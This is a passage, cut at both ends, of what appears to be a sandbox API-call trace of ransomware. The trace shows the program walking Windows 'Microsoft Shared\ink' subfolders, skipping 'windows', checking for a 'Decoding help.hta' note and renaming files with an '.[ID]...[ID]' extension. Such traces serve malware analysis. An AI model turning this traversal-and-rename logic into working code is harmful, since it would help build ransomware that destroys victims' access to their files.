Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.908] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="de-DE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE" [0048.908] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*" [0048.908] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24bee300, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.915] CloseHandle (hObject=0x438) returned 1 [0048.915] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0048.915] lstrcmpW (lpString1=".", lpString2="el-GR") returned -1 [0048.915] lstrcmpW (lpString1="..", lpString2="el-GR") returned -1 [0048.915] lstrcmpiW (lpString1="windows", lpString2="el-GR") returned 1 [0048.917] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.917] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="el-GR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR" [0048.917] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*" [0048.917] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24c1e3d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.925] CloseHandle (hObject=0x438) returned 1 [0048.925] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0048.926] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0048.926] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0048.926] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0048.928] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.928] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.928] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" [0048.928] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*" [0048.928] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24c4e4a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.940] CloseHandle (hObject=0x438) returned 1 [0048.940] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0048.940] lstrcmpW (lpString1=".", lpString2="es-ES") returned -1 [0048.940] lstrcmpW (lpString1="..", lpString2="es-ES") returned -1 [0048.940] lstrcmpiW (lpString1="windows", lpString2="es-ES") returned 1 [0048.942] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.943] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.943] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="es-ES" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES" [0048.943] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*" [0048.943] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24c965d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.953] CloseHandle (hObject=0x438) returned 1 [0048.953] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0048.953] lstrcmpW (lpString1=".", lpString2="et-EE") returned -1 [0048.953] lstrcmpW (lpString1="..", lpString2="et-EE") returned -1 [0048.953] lstrcmpiW (lpString1="windows", lpString2="et-EE") returned 1 [0048.955] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.956] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="et-EE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE" [0048.956] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*" [0048.956] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24cae640, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.965] CloseHandle (hObject=0x438) returned 1 [0048.965] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0048.965] lstrcmpW (lpString1=".", lpString2="fi-FI") returned -1 [0048.965] lstrcmpW (lpString1="..", lpString2="fi-FI") returned -1 [0048.965] lstrcmpiW (lpString1="windows", lpString2="fi-FI") returned 1 [0048.967] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.967] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.967] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="fi-FI" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI" [0048.967] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*" [0048.967] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24cde710, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.978] CloseHandle (hObject=0x438) returned 1 [0048.978] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0048.978] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.978] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.978] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0048.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0048.978] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FlickAnimation.avi") returned -1 [0048.979] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0048.979] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.979] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.979] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="FlickAnimation.avi" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" [0048.979] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" [0048.979] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.[ID]g9uZrLhJaygpwRm1[ID]" [0048.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.979] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0048.979] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.979] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.979] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0048.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0048.980] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FlickLearningWizard.exe") returned -1 [0048.980] lstrlenW (lpString="FlickLearningWizard.exe") returned 23 [0048.980] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.980] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.980] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="FlickLearningWizard.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" [0048.980] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" [0048.980] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0048.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.980] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0048.980] lstrcmpW (lpString1=".", lpString2="fr-FR") returned -1 [0048.980] lstrcmpW (lpString1="..", lpString2="fr-FR") returned -1 [0048.980] lstrcmpiW (lpString1="windows", lpString2="fr-FR") returned 1 [0048.983] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.983] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.983] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="fr-FR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR" [0048.983] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*" [0048.983] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d0e7e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.996] CloseHandle (hObject=0x438) returned 1 [0048.996] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0048.996] lstrcmpW (lpString1=".", lpString2="fsdefinitions") returned -1 [0048.996] lstrcmpW (lpString1="..", lpString2="fsdefinitions") returned -1 [0048.996] lstrcmpiW (lpString1="windows", lpString2="fsdefinitions") returned 1 [0048.999] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.999] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="fsdefinitions" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" [0048.999] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" [0048.999] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.999] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d56918, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0049.469] CloseHandle (hObject=0x438) returned 1 [0049.469] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0049.469] lstrcmpW (lpString1=".", lpString2="he-IL") returned -1 [0049.469] lstrcmpW (lpString1="..", lpString2="he-IL") returned -1 [0049.469] lstrcmpiW (lpString1="windows", lpString2="he-IL") returned 1 [0050.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.058] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="he-IL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL" [0050.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*" [0050.058] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0050.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24e9ee70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0050.062] CloseHandle (hObject=0x53c) returned 1 [0050.062] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0050.062] lstrcmpW (lpString1=".", lpString2="hr-HR") returned -1 [0050.062] lstrcmpW (lpString1="..", lpString2="hr-HR") returned -1 [0050.062] lstrcmpiW (lpString1="windows", lpString2="hr-HR") returned 1 [0050.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hr-HR" | out: 